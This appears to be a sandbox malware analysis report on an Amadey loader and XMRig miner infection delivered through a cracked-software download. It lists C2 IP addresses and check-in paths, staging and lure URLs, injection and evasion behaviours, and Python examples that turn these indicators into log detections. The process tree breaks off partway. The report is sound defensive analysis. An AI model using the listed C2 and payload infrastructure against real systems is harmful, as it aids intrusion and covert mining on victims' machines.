Analysis
- max time kernel: 218s
- max time network: 219s
- platform: windows11-21h2_x64
- resource: win11-20241007-en
- resource tags: arch:x64, arch:x86, image:win11-20241007-en, locale:en-us, os:windows11-21h2-x64, system
- submitted: 18/12/2024, 22:47
- Static task: static1
- URLScan task: urlscan1
General
Malware Config
Extracted
- family: amadey
- version: 5.10
- botnet: 7ff894
- C2:
  - http://185.208.158.116
  - http://185.209.162.226
- install_dir: 5ce3f566dd
- install_file: Gxtuum.exe
- strings_key: ab76263a4c4ffd38c0300987d14cb704
- url_paths:
  - /bVoZEtTa1/index.php
  - /bVoZEtTa3/index.php
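The config above only becomes actionable once the C2 hosts and url_paths are combined into the full check-in URLs the bot will request. The block below is an added example (not the sandbox's code and not Amadey's): it builds those URLs from the extracted values, adds the download and landing hosts that appear in the process tree further down (wabemquesturge.com, gotra.top), and runs the resulting indicators over a few constructed proxy log lines, ranking a full check-in URL above a bare host match.

```python
"""Turn the extracted Amadey config into concrete network indicators and
run them over proxy log lines.  Added example for this report; it is not
the sandbox's code and not Amadey's.  Config values are copied from the
"Malware Config" section, the staging hosts from the process tree; the
proxy log lines are constructed for the demo."""
import re
from urllib.parse import urlsplit

# Extracted config (see "Malware Config").
AMADEY_CONFIG = {
    "family": "amadey",
    "version": "5.10",
    "c2": ["http://185.208.158.116", "http://185.209.162.226"],
    "url_paths": ["/bVoZEtTa1/index.php", "/bVoZEtTa3/index.php"],
    "install_dir": "5ce3f566dd",
    "install_file": "Gxtuum.exe",
}

# Hosts contacted by wget.exe and the Edge landing page in the process tree.
STAGING_HOSTS = {
    "22800.wabemquesturge.com",
    "50291.wabemquesturge.com",
    "drz83kjv.gotra.top",
}

# Constructed proxy log in a "client method url status" shape.
SAMPLE_PROXY_LOG = """\
10.0.0.5 POST http://185.208.158.116/bVoZEtTa1/index.php 200
10.0.0.5 GET https://22800.wabemquesturge.com/3 200
10.0.0.7 GET https://www.example.com/index.php 200
10.0.0.5 POST http://185.209.162.226/bVoZEtTa3/index.php 200
10.0.0.9 GET http://185.208.158.116/somethingelse 404
"""

LOG_RE = re.compile(
    r"^(?P<client>\S+)\s+(?P<method>[A-Z]+)\s+(?P<url>\S+)\s+(?P<status>\d{3})$"
)


def c2_urls(config):
    """Every C2 host combined with every url_path: the full set of
    check-in URLs the bot can build from this config."""
    return [host.rstrip("/") + path
            for host in config["c2"] for path in config["url_paths"]]


def c2_hosts(config):
    return {urlsplit(host).hostname for host in config["c2"]}


def match_proxy_log(log_text, config=AMADEY_CONFIG, staging_hosts=STAGING_HOSTS):
    """Return (client, url, reason) for each line hitting an indicator.
    A full check-in URL is stronger evidence than a bare host, so the two
    are reported with different reasons."""
    exact = set(c2_urls(config))
    hosts = c2_hosts(config) | set(staging_hosts)
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        url = m["url"]
        if url in exact:
            hits.append((m["client"], url, "amadey-c2-checkin"))
        elif urlsplit(url).hostname in hosts:
            hits.append((m["client"], url, "ioc-host"))
    return hits


def infected_clients(hits):
    """Clients seen talking to a full check-in URL, not just an IoC host."""
    return sorted({c for c, _, reason in hits if reason == "amadey-c2-checkin"})


if __name__ == "__main__":
    for url in c2_urls(AMADEY_CONFIG):
        print("C2:", url)
    hits = match_proxy_log(SAMPLE_PROXY_LOG)
    for hit in hits:
        print(*hit)
    print("check-in clients:", infected_clients(hits))
```

Hosts alone are a weaker signal (185.208.158.116 may serve other content, and bitbucket.org / raw.githubusercontent.com from the "Legitimate hosting services" signature are far too common to block), so only the exact check-in URL drives the `infected_clients` verdict.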
Signatures

Amadey family

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description | pid | Process | procid_target
PID 1940 created 1088 | 1940 | 11088582 | 49

Xmrig family
XMRig Miner payload 8 IoCs
resource | yara_rule
behavioral1/memory/3356-1280-0x0000000140000000-0x0000000140835000-memory.dmp | xmrig
behavioral1/memory/3356-1282-0x0000000140000000-0x0000000140835000-memory.dmp | xmrig
behavioral1/memory/3356-1285-0x0000000140000000-0x0000000140835000-memory.dmp | xmrig
behavioral1/memory/3356-1286-0x0000000140000000-0x0000000140835000-memory.dmp | xmrig
behavioral1/memory/3356-1284-0x0000000140000000-0x0000000140835000-memory.dmp | xmrig
behavioral1/memory/3356-1283-0x0000000140000000-0x0000000140835000-memory.dmp | xmrig
behavioral1/memory/3356-1279-0x0000000140000000-0x0000000140835000-memory.dmp | xmrig
behavioral1/memory/3356-1287-0x0000000140000000-0x0000000140835000-memory.dmp | xmrig

Command and Scripting Interpreter: PowerShell 2 IoCs
pid | Process
3336 | powershell.exe
1892 | powershell.exe
Executes dropped EXE 12 IoCs
pid | Process
2036 | Launcher.exe
620 | Launcher.exe
2176 | wget.exe
4784 | winrar.exe
1940 | 11088582
4820 | wget.exe
4420 | winrar.exe
1372 | 22040691
4164 | Ide.com
4732 | fd3cd35a12.exe
2792 | Officials.com
492 | Officials.com

Loads dropped DLL 1 IoCs
pid | Process
3992 | rundll32.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 7 IoCs
flow | ioc
44 | bitbucket.org
44 | raw.githubusercontent.com
49 | bitbucket.org
52 | raw.githubusercontent.com
16 | bitbucket.org
30 | bitbucket.org
35 | bitbucket.org

Enumerates processes with tasklist 1 TTPs 4 IoCs
pid | Process
1940 | tasklist.exe
3820 | tasklist.exe
4624 | tasklist.exe
3304 | tasklist.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid | Process
1940 | 11088582
1940 | 11088582

Suspicious use of SetThreadContext 2 IoCs
description | pid | Process | procid_target
PID 2792 set thread context of 492 | 2792 | Officials.com | 150
PID 492 set thread context of 3356 | 492 | Officials.com | 152

UPX packed payload (yara rule: upx) 13 IoCs
resource | yara_rule
behavioral1/memory/3356-1275-0x0000000140000000-0x0000000140835000-memory.dmp | upx
behavioral1/memory/3356-1280-0x0000000140000000-0x0000000140835000-memory.dmp | upx
behavioral1/memory/3356-1282-0x0000000140000000-0x0000000140835000-memory.dmp | upx
behavioral1/memory/3356-1285-0x0000000140000000-0x0000000140835000-memory.dmp | upx
behavioral1/memory/3356-1286-0x0000000140000000-0x0000000140835000-memory.dmp | upx
behavioral1/memory/3356-1284-0x0000000140000000-0x0000000140835000-memory.dmp | upx
behavioral1/memory/3356-1283-0x0000000140000000-0x0000000140835000-memory.dmp | upx
behavioral1/memory/3356-1278-0x0000000140000000-0x0000000140835000-memory.dmp | upx
behavioral1/memory/3356-1277-0x0000000140000000-0x0000000140835000-memory.dmp | upx
behavioral1/memory/3356-1279-0x0000000140000000-0x0000000140835000-memory.dmp | upx
behavioral1/memory/3356-1276-0x0000000140000000-0x0000000140835000-memory.dmp | upx
behavioral1/memory/3356-1274-0x0000000140000000-0x0000000140835000-memory.dmp | upx
behavioral1/memory/3356-1287-0x0000000140000000-0x0000000140835000-memory.dmp | upx
Drops file in Windows directory 8 IoCs
description | ioc | Process
File opened for modification | C:\Windows\SportsMichigan | 22040691
File opened for modification | C:\Windows\DirtyBaseline | 22040691
File opened for modification | C:\Windows\IncTelevisions | 22040691
File opened for modification | C:\Windows\CarefulIndiana | fd3cd35a12.exe
File opened for modification | C:\Windows\LionLies | fd3cd35a12.exe
File opened for modification | C:\Windows\BookmarkVariations | fd3cd35a12.exe
File opened for modification | C:\Windows\CleanersBrussels | fd3cd35a12.exe
File opened for modification | C:\Windows\WalkingOpens | fd3cd35a12.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

Program crash 1 IoCs
pid | pid_target | Process | procid_target
4816 | 3992 | WerFault.exe | 146
System Location Discovery: System Language Discovery 1 TTPs 29 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
description | ioc | Process (occurrences)
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | findstr.exe (6), cmd.exe (6), tasklist.exe (4), Launcher.exe (2), choice.exe (2), powershell.exe (2), schtasks.exe (1), 11088582 (1), 22040691 (1), fd3cd35a12.exe (1), svchost.exe (1), Ide.com (1), rundll32.exe (1)
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 | taskmgr.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | taskmgr.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | taskmgr.exe

Enumerates system info in registry 2 TTPs 3 IoCs
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | msedge.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | msedge.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | msedge.exe

Modifies registry class 2 IoCs
description | ioc | Process
Key created | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings | msedge.exe
Key created | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings | taskmgr.exe

Modifies system certificate store 5 IoCs
Launcher.exe writes the GlobalSign Root CA - R3 certificate (SHA-1 thumbprint D69B561148F01C77C54578C10926DF5B856976AD; the UTF-16 name is visible inside the hex) into the machine AuthRoot store. Populating AuthRoot with a public root is what CryptoAPI's automatic root update does when a process validates a TLS chain ending in that root, so on its own this row shows that Launcher.exe made an HTTPS connection, not that it tampered with trust. The Blob values below are the serialised certificate plus its cached properties.
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD Launcher.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 0f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b1400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba953030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e1063
3e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f Launcher.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 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 Launcher.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 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 Launcher.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 
5c000000010000000400000000080000040000000100000010000000c5dfb849ca051355ee2dba1ac33eb028030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba9531400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b0b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab190000000100000010000000d0fd3c9c380d7b65e26b9a3fedd39b8f2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916
a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f Launcher.exe -
NTFS ADS 1 IoCs
description | ioc | Process
File opened for modification | C:\Users\Admin\Downloads\bandicam-crack.zip:Zone.Identifier | msedge.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid | Process
804 | schtasks.exe
236 | schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs
pid | Process | occurrences
4904 | msedge.exe | 2
1064 | msedge.exe | 2
1816 | msedge.exe | 2
584 | identity_helper.exe | 2
4552 | msedge.exe | 2
3336 | powershell.exe | 2
1892 | powershell.exe | 2
2760 | taskmgr.exe | 40
1940 | 11088582 | 6
4800 | svchost.exe | 4

Suspicious behavior: GetForegroundWindowSpam 2 IoCs
pid | Process
3352 | 7zFM.exe
2760 | taskmgr.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 9 IoCs
pid | Process | occurrences
1064 | msedge.exe | 9

Suspicious use of AdjustPrivilegeToken 14 IoCs
description | pid | Process
Token: SeRestorePrivilege | 3352 | 7zFM.exe
Token: 35 | 3352 | 7zFM.exe
Token: SeSecurityPrivilege | 3352 | 7zFM.exe
Token: SeDebugPrivilege | 3336 | powershell.exe
Token: SeDebugPrivilege | 1892 | powershell.exe
Token: SeDebugPrivilege | 2760 | taskmgr.exe
Token: SeSystemProfilePrivilege | 2760 | taskmgr.exe
Token: SeCreateGlobalPrivilege | 2760 | taskmgr.exe
Token: SeDebugPrivilege | 1940 | tasklist.exe
Token: SeDebugPrivilege | 3820 | tasklist.exe
Token: SeDebugPrivilege | 4624 | tasklist.exe
Token: SeDebugPrivilege | 3304 | tasklist.exe
Token: SeLockMemoryPrivilege | 3356 | dwm.exe
Token: SeLockMemoryPrivilege | 3356 | dwm.exe

Suspicious use of FindShellTrayWindow 64 IoCs
pid | Process | occurrences
1064 | msedge.exe | 44
3352 | 7zFM.exe | 2
2176 | wget.exe | 1
2760 | taskmgr.exe | 17

Suspicious use of SendNotifyMessage 64 IoCs
pid | Process | occurrences
1064 | msedge.exe | 12
2760 | taskmgr.exe | 41
4164 | Ide.com | 3
2760 | taskmgr.exe | 8

Suspicious use of WriteProcessMemory 64 IoCs
description | pid | Process | procid_target | occurrences
PID 1064 wrote to memory of 1480 | 1064 | msedge.exe | 77 | 2
PID 1064 wrote to memory of 4888 | 1064 | msedge.exe | 78 | 40
PID 1064 wrote to memory of 4904 | 1064 | msedge.exe | 79 | 2
PID 1064 wrote to memory of 2036 | 1064 | msedge.exe | 80 | 20

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
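Read together, the signature rows describe one execution chain that the process tree below cannot show: 11088582 (PID 1940) creates a process with a spoofed parent (NtCreateUserProcessOtherParentProcess, sihost.exe 1088), and Officials.com 2792 hollows a child Officials.com 492, which in turn hollows 3356, where the XMRig payload is found in memory and SeLockMemoryPrivilege (XMRig's large-pages privilege) is enabled under the name dwm.exe. The block below is an added example, not the sandbox's code: it rebuilds the real lineage from records constructed to mirror those signature rows. One mapping is an assumption: that the spoofed child is the svchost.exe 4800 shown under sihost.exe 1088 in the tree, since that is the only process the tree attributes to 1088.

```python
"""Reconstruct the real process lineage behind the parent-spoofing and
thread-context-injection signatures.  Added example, not the sandbox's
own code.  Event records are constructed from the signature rows (pids
and names as printed); the child of the spoofed create is assumed to be
svchost.exe 4800."""
from collections import namedtuple

Proc = namedtuple("Proc", "pid name apparent_parent")

# Process table: pid -> (name, parent as the tree displays it).
PROCS = {
    1088: Proc(1088, "sihost.exe", None),
    4800: Proc(4800, "svchost.exe", 1088),     # shown under sihost.exe (assumed spoofed child)
    1940: Proc(1940, "11088582", None),        # real parent not in this excerpt
    2792: Proc(2792, "Officials.com", None),
    492:  Proc(492, "Officials.com", 2792),
    3356: Proc(3356, "dwm.exe", 492),
}

# One record per signature row.
EVENTS = [
    # Suspicious use of NtCreateUserProcessOtherParentProcess
    {"type": "create_other_parent", "pid": 1940, "child": 4800, "parent_claimed": 1088},
    # Suspicious use of SetThreadContext
    {"type": "set_thread_context", "pid": 2792, "target": 492},
    {"type": "set_thread_context", "pid": 492, "target": 3356},
    # XMRig Miner payload (in-memory yara hit)
    {"type": "yara", "pid": 3356, "rule": "xmrig", "region": "0x140000000-0x140835000"},
    # Suspicious use of AdjustPrivilegeToken
    {"type": "privilege", "pid": 3356, "token": "SeLockMemoryPrivilege"},
]


def real_parent(pid, procs=PROCS, events=EVENTS):
    """The process that actually called NtCreateUserProcess: the spoofing
    process when a PROC_THREAD_ATTRIBUTE_PARENT_PROCESS record exists,
    otherwise the parent the tree shows."""
    for ev in events:
        if ev["type"] == "create_other_parent" and ev["child"] == pid:
            return ev["pid"]
    return procs[pid].apparent_parent


def spoofed_parents(events=EVENTS):
    """(child, claimed parent, real creator) for every spoofed create."""
    return [(ev["child"], ev["parent_claimed"], ev["pid"])
            for ev in events if ev["type"] == "create_other_parent"]


def injection_chain(pid, events=EVENTS):
    """Walk SetThreadContext edges backwards from `pid` to the process
    that started the hollowing chain.  Returns [origin, ..., pid]."""
    writers = {ev["target"]: ev["pid"]
               for ev in events if ev["type"] == "set_thread_context"}
    chain, seen = [pid], {pid}
    while chain[0] in writers and writers[chain[0]] not in seen:
        chain.insert(0, writers[chain[0]])
        seen.add(chain[0])
    return chain


def attribute_payloads(procs=PROCS, events=EVENTS):
    """For each in-memory yara hit: the victim, the origin of the chain
    that put the payload there, and privileges the victim enabled."""
    out = []
    for ev in events:
        if ev["type"] != "yara":
            continue
        chain = injection_chain(ev["pid"], events)
        privs = sorted(e["token"] for e in events
                       if e["type"] == "privilege" and e["pid"] == ev["pid"])
        out.append({
            "rule": ev["rule"],
            "victim": f'{procs[ev["pid"]].name} ({ev["pid"]})',
            "origin": f'{procs[chain[0]].name} ({chain[0]})',
            "chain": [f"{procs[p].name} ({p})" for p in chain],
            "privileges": privs,
        })
    return out


if __name__ == "__main__":
    for hit in attribute_payloads():
        print(hit)
    for child, claimed, real in spoofed_parents():
        print(f"{PROCS[child].name} {child}: tree says {PROCS[claimed].name} {claimed},"
              f" created by {PROCS[real].name} {real}")
```

The point for triage: a tree that trusts the parent PID puts svchost.exe 4800 under sihost.exe and dwm.exe 3356 under an innocuous-looking Officials.com, while the creator and thread-context edges attribute both to the dropped binaries. Sysmon Event ID 1 records the spoofed parent as well, so the same walk applies to real telemetry.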
Processes

[1] C:\Windows\system32\sihost.exe
    command: sihost.exe
    PID: 1088
    [2] C:\Windows\SysWOW64\svchost.exe
        command: "C:\Windows\System32\svchost.exe"
        - System Location Discovery: System Language Discovery
        - Suspicious behavior: EnumeratesProcesses
        PID: 4800
[1] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://drz83kjv.gotra.top/54/LROJYmO
    - Enumerates system info in registry
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of WriteProcessMemory
    PID: 1064
    [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffb603b3cb8,0x7ffb603b3cc8,0x7ffb603b3cd8
        PID: 1480
    [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1880,6914889636912935102,1134626418975215849,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1892 /prefetch:2
        PID: 4888
    [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1880,6914889636912935102,1134626418975215849,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2112 /prefetch:3
        - Suspicious behavior: EnumeratesProcesses
        PID: 4904
    [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1880,6914889636912935102,1134626418975215849,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2764 /prefetch:8
        PID: 2036
    [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1880,6914889636912935102,1134626418975215849,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3264 /prefetch:1
        PID: 2300
    [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1880,6914889636912935102,1134626418975215849,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:1
        PID: 1548
    [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1880,6914889636912935102,1134626418975215849,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4680 /prefetch:1
        PID: 3352
    [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1880,6914889636912935102,1134626418975215849,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4904 /prefetch:1
        PID: 3568
    [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1880,6914889636912935102,1134626418975215849,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4988 /prefetch:8
        - Suspicious behavior: EnumeratesProcesses
        PID: 1816
    [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1880,6914889636912935102,1134626418975215849,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5272 /prefetch:1
        PID: 2108
    [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1880,6914889636912935102,1134626418975215849,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5292 /prefetch:1
        PID: 2780
    [2] C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
        command: "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1880,6914889636912935102,1134626418975215849,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6200 /prefetch:8
        - Suspicious behavior: EnumeratesProcesses
        PID: 584
    [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
